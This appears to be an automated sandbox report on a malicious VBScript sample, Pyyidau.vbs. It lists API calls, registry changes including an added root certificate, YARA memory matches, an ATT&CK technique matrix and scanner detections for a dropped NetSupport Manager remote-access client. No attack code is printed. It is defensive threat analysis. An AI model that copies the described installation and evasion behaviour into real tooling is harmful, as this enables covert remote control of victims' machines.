                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,28_2_00B52C9B
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,28_2_00B52C5F
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoA,28_2_00B5BE77
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,30_2_004C86E2
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,30_2_004C2744
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,30_2_004C87BC
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,30_2_004C2839
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,30_2_004C28E0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,30_2_004C293B
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,30_2_004C2B0C
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,30_2_004C2BF8
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,30_2_004C2C5F
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,30_2_004C2C9B
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoA,30_2_004CBE77
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_00EBC73C
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,31_2_00EBC8D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,31_2_00EBC831
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,31_2_00EBC933
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,31_2_00EBCBF0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,31_2_00EBCBC6
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,31_2_00EBCB04
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,31_2_00EBCC93
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,31_2_00EBCC57
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,31_2_00EC576A
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,31_2_00EC5844
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,31_2_00EC5E2D
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,32_2_001E86E2
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_001E2744
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,32_2_001E87BC
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,32_2_001E2839
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,32_2_001E28E0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,32_2_001E293B
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,32_2_001E2B0C
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_001E2BF8
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_001E2C5F
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,32_2_001E2C9B
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoA,32_2_001EBE77
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018D970 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,__wcsicoll,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,32_2_0018D970
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI3FCC.tmp Queries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,28_2_00B2F030
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B25490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,28_2_00B25490
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B40EEB __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,28_2_00B40EEB
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2F6D0 GetModuleFileNameW,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetCurrentProcess,FreeLibrary,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,28_2_00B2F6D0
                                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Blob
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B17600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,28_2_00B17600
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00487600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,30_2_00487600
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E94E20 SHParseDisplayName,SHBindToParent,CoTaskMemFree,31_2_00E94E20
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001A7600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,32_2_001A7600
                                Source: Yara matchFile source: 36.2.pcicfgui_client.exe.6f950000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.0.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8e7e648.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.2.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.69e80000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6f900000.10.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.6be08bc0.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8fe0848.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6f950000.11.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.0.MSI264F.tmp.ae0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.6f950000.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.2.checkdvd.exe.e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.winst64.exe.7ff778ee0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.2.MSI2BE4.tmp.450000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.MSI3FCC.tmp.170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6be08bc0.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.612031c.29.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.613b138.28.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8e7e648.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.0.checkdvd.exe.e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.0.winst64.exe.7ff778ee0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.MSI3FCC.tmp.170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.0.MSI2BE4.tmp.450000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 45.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.0.MSI51C1.tmp.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6f8e0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.2e28d08.25.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.2.MSI51C1.tmp.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.0.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6cbc0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6c650000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.2.MSI264F.tmp.ae0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8e70448.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.613b138.28.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.69ea0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.pcicfgui_client.exe.2970000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6bbd0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8fe0848.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.6bbd0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8fc5c48.9.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000000.2666385181.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000000.2665153542.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2702240534.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2439151550.0000000008FC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information221
                                Scripting
                                1
                                Replication Through Removable Media
                                631
                                Windows Management Instrumentation
                                221
                                Scripting
                                1
                                LSASS Driver
                                11
                                Disable or Modify Tools
                                21
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                1
                                LSASS Driver
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory11
                                Peripheral Device Discovery
                                Remote Desktop Protocol21
                                Input Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                1
                                DLL Side-Loading
                                1
                                Access Token Manipulation
                                3
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares2
                                Clipboard Data
                                11
                                Non-Standard Port
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts22
                                Command and Scripting Interpreter
                                42
                                Windows Service
                                42
                                Windows Service
                                11
                                Software Packing
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object ModelInput Capture2
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Scheduled Task/Job
                                1
                                Scheduled Task/Job
                                112
                                Process Injection
                                1
                                DLL Side-Loading
                                LSA Secrets257
                                System Information Discovery
                                SSHKeylogging113
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media12
                                Service Execution
                                RC Scripts1
                                Scheduled Task/Job
                                1
                                File Deletion
                                Cached Domain Credentials2
                                Query Registry
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote Services1
                                PowerShell
                                Startup ItemsStartup Items132
                                Masquerading
                                DCSync1261
                                Security Software Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job661
                                Virtualization/Sandbox Evasion
                                Proc Filesystem2
                                Process Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Access Token Manipulation
                                /etc/passwd and /etc/shadow661
                                Virtualization/Sandbox Evasion
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                                Process Injection
                                Network Sniffing11
                                Application Window Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                                System Owner/User Discovery
                                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                [Behavior graph: ID 1561295, Sample: Pyyidau.vbs, Startdate: 23/11/2024, Architecture: WINDOWS, Score: 100]

                                Source | Detection | Scanner | Label | Link
                                Pyyidau.vbs | 16% | ReversingLabs | Script-WScript.Trojan.Snake |
                                Pyyidau.vbs | 26% | Virustotal | | Browse
                                Source | Detection | Scanner | Label | Link
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXE | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe | 5% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL | 5% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL | 8% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE | 3% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll | 0% | ReversingLabs | |
